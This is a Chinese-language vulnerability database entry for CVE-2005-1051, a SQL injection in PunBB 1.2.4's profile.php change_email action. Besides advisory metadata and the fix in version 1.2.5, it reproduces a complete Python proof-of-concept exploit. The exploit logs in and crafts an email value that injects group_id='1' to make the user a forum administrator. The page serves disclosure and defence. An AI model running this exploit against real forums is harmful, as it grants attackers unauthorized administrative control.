CVE-2005-1051
CVSS6.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:16:56
NMCOES    

[原文]SQL injection vulnerability in profile.php in PunBB 1.2.4 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a change_email action.


[CNNVD]PunBB profile.php远程SQL注入漏洞(CNNVD-200505-662)

        PunBB是一款基于PHP的论坛程序。
        PunBB中存在SQL注入漏洞,远程攻击者可能非法获取数据库的访问。
        起因是在SQL查询中使用用户提供的输入前没有正确的通过profile.php脚本检查用户输入。攻击者可以利用这个漏洞获取对有漏洞论坛的管理访问。
        

- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:punbb:punbb:1.0_rc1
cpe:/a:punbb:punbb:1.0_rc2
cpe:/a:punbb:punbb:1.1
cpe:/a:punbb:punbb:1.0
cpe:/a:punbb:punbb:1.1.2
cpe:/a:punbb:punbb:1.2.1
cpe:/a:punbb:punbb:1.0_alpha
cpe:/a:punbb:punbb:1.1.3
cpe:/a:punbb:punbb:1.2.2
cpe:/a:punbb:punbb:1.1.4
cpe:/a:punbb:punbb:1.2.3
cpe:/a:punbb:punbb:1.1.5
cpe:/a:punbb:punbb:1.2.4
cpe:/a:punbb:punbb:1.0_beta1
cpe:/a:punbb:punbb:1.0.1
cpe:/a:punbb:punbb:1.0_beta2
cpe:/a:punbb:punbb:1.0_beta3
cpe:/a:punbb:punbb:1.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1051
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1051
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-662
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111306207306155&w=2
(UNKNOWN)  BUGTRAQ  20050408 PunBB <= 1.2.4 - change email to become admin exploit
http://www.securityfocus.com/bid/13071
(PATCH)  BID  13071

- 漏洞信息

PunBB profile.php远程SQL注入漏洞
中危 SQL注入
2005-05-02 00:00:00 2006-02-13 00:00:00
远程  
        PunBB是一款基于PHP的论坛程序。
        PunBB中存在SQL注入漏洞,远程攻击者可能非法获取数据库的访问。
        起因是在SQL查询中使用用户提供的输入前没有正确的通过profile.php脚本检查用户输入。攻击者可以利用这个漏洞获取对有漏洞论坛的管理访问。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.punbb.org/

- 漏洞信息 (928)

PunBB 1.2.4 (change_email) SQL Injection Exploit (EDBID:928)
php webapps
2005-04-11 Verified
0 Stefan Esser
N/A [点击下载]
#!/usr/bin/python
#######################################################################
#  _  _                _                     _       ___  _  _  ___
# | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
# |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|
#
#######################################################################
#         Proof of concept code from the Hardened-PHP Project
#######################################################################
#
#                           -= PunBB 1.2.4 =-
#                   change_email SQL injection exploit
#
#  user-supplied data within the database is still user-supplied data
#
#######################################################################

import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
   print "PunBB 1.2.4 - change_email SQL injection exploit"
   print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
   banner()
   print "Usage:\n"
   print "   $ ./punbb_change_email.py [options]\n"
   print "        -h http_url   url of the punBB forum to exploit"
   print "                      f.e. http://www.forum.net/punBB/"
   print "        -u username   punBB forum useraccount"
   print "        -p password   punBB forum userpassword"
   print "        -e email      email address where the admin leve activation email is sent"
   print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
   print ""
   sys.exit(-1)

def main():
   try:
       opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
   except getopt.GetoptError:
       usage()

   if len(__argv__) < 10:
       usage()

   username = None
   password = None
   email = None
   domain = None
   host = None
   for o, arg in opts:
       if o == "-h":
           host = arg
       if o == "-u":
           username = arg
       if o == "-p":
           password = arg
       if o == "-e":
           email = arg
       if o == "-d":
           domain = arg

   # Printout banner
   banner()

   # Check if everything we need is there
   if host == None:
       print "[-] need a host to connect to"
       sys.exit(-1)
   if username == None:
       print "[-] username needed to continue"
       sys.exit(-1)
   if password == None:
       print "[-] password needed to continue"
       sys.exit(-1)
   if email == None:
       print "[-] email address needed to continue"
       sys.exit(-1)
   if domain == None:
       print "[-] catch all domain needed to continue"
       sys.exit(-1)

   # Retrive cookie
   params = {
       'req_username' : username,
       'req_password' : password,
       'form_sent' : 1
   }

   wclient = urllib.URLopener()

   print "[+] Connecting to retrieve cookie"

   req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
   info = req.info()
   if 'set-cookie' not in info:
       print "[-] Unable to retrieve cookie... something is wrong"
       sys.exit(-3)
   cookie = info['set-cookie']
   cookie = cookie[:string.find(cookie, ';')]
   print "[+] Cookie found - extracting user_id"
   user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
   print "[+] User-ID: %d" % (int(user_id))
   wclient.addheader('Cookie', cookie);

   email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
   append = 'group_id=\'1'
   email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain

   params = {
       'req_new_email' : email,
       'form_sent' : 1
   }

   print "[+] Connecting to request change email"
   req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))

   print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"

if __name__ == "__main__":
   main()

# milw0rm.com [2005-04-11]
		

- 漏洞信息

15372
PunBB profile.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

PunBB contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the 'id' variables in the profile.php script not being properly sanitized and may allow an attacker to inject or manipulate SQL queries.

- 时间线

2005-04-07 Unknow
2005-04-11 Unknow

- 解决方案

Upgrade to version 1.2.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

PunBB Profile.PHP SQL Injection Vulnerability
Input Validation Error 13071
Yes No
2005-04-08 12:00:00 2009-07-12 12:56:00
The researcher responsible for discovering this issue is unknown at the moment.

- 受影响的程序版本

PunBB PunBB 1.2.4
PunBB PunBB 1.2.3
PunBB PunBB 1.2.2
PunBB PunBB 1.2.1
PunBB PunBB 1.1.5
PunBB PunBB 1.1.4
PunBB PunBB 1.1.3
PunBB PunBB 1.1.2
PunBB PunBB 1.1.1
PunBB PunBB 1.1
PunBB PunBB 1.0.1
PunBB PunBB 1.0 RC2
PunBB PunBB 1.0 RC1
PunBB PunBB 1.0 _beta3
PunBB PunBB 1.0 _beta2
PunBB PunBB 1.0 _beta1
PunBB PunBB 1.0 _alpha
PunBB PunBB 1.0
PunBB PunBB 1.2.5

- 不受影响的程序版本

PunBB PunBB 1.2.5

- 漏洞讨论

PunBB is affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input through the 'profile.php' script before using it in a SQL query.

This issue can be successfully exploited to gain administrative access to a vulnerable forum.

PunBB 1.2.4 and prior versions are vulnerable.

- 漏洞利用

No exploit is required.

The following proof of concept allowing the attacker to gain administrative access was provided by Hardened-PHP Project:

- 解决方案

This issue has been addressed in PunBB 1.2.5.


PunBB PunBB 1.0 RC1

PunBB PunBB 1.0

PunBB PunBB 1.0 _beta2

PunBB PunBB 1.0 RC2

PunBB PunBB 1.0 _beta3

PunBB PunBB 1.0 _alpha

PunBB PunBB 1.0 _beta1

PunBB PunBB 1.0.1

PunBB PunBB 1.1

PunBB PunBB 1.1.1

PunBB PunBB 1.1.2

PunBB PunBB 1.1.3

PunBB PunBB 1.1.4

PunBB PunBB 1.1.5

PunBB PunBB 1.2.1

PunBB PunBB 1.2.2

PunBB PunBB 1.2.3

PunBB PunBB 1.2.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站